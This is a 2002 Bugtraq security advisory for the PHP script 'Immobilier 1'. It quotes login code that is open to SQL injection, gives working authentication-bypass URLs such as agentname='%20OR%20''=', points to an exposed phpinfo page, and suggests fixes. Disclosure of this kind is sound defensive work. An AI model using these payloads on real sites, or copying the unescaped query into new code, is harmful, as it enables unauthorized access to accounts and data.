[27999] in bugtraq
Immobilier 1 (PHP)
daemon@ATHENA.MIT.EDU (Frog Man)
Tue Nov 26 04:50:18 2002
From: "Frog Man" <leseulfrog@hotmail.com>
To: bugtraq@securityfocus.com
Date: Mon, 25 Nov 2002 17:33:24 +0100
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1; format=flowed
Message-ID: <F113rv8L5dBKlrWJ3fv0000170c@hotmail.com>
Informations :
°°°°°°°°°°°°°°
Version, Website : ?
Problems :
- phpinfo()
- SQL Injection
PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
agentadmin.php :
--------------------------------------------------------------
[...]
} elseif ($agentname != "" OR $current_user != "")
{
$sql = "SELECT id FROM agents WHERE agent='$agentname' and
agentpass='$agentpassword'";
$result = mysql_query($sql) or die("Couldn't execute query.");
$num = mysql_numrows($result);
if ($num == 1) {
session_register("agentname");
session_register("agentpassword");
[...]
session_register("current_user");
session_register("agent");
[...]
--------------------------------------------------------------
admin/phpinfo.php :
-----------
<?
phpinfo();
?>
-----------
Exploits :
°°°°°°°°°°
http://[target]/agentadmin.php?agentname='%20OR%20''='&agentpassword='%20OR%20''='
or
http://[target]/agentadmin.php?agentname=[USERNAME]&agentpasword='%20OR%20''='
http://[target]/admin/phpinfo.php
Solutions :
°°°°°°°°°°°
- Delete /admin/phpinfo.php
- Put this lines :
------------------------------------------
$agentname=addslashes($agentname);
$currentuser=addslashes($currentuser);
$agentpassword=addslashes($agentpassword);
------------------------------------------
into common.php.
A patch can be found on http://www.phpsecure.org.
More details :
°°°°°°°°°°°°°°
In french :
http://www.frog-man.org/tutos/Immoblier.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FImmoblier.txt&langpair=fr%7Cen&hl=fr&ie=ASCII&oe=ASCII
frog-m@n
_________________________________________________________________
MSN Messenger : discutez en direct avec vos amis !
http://www.msn.fr/msger/default.asp
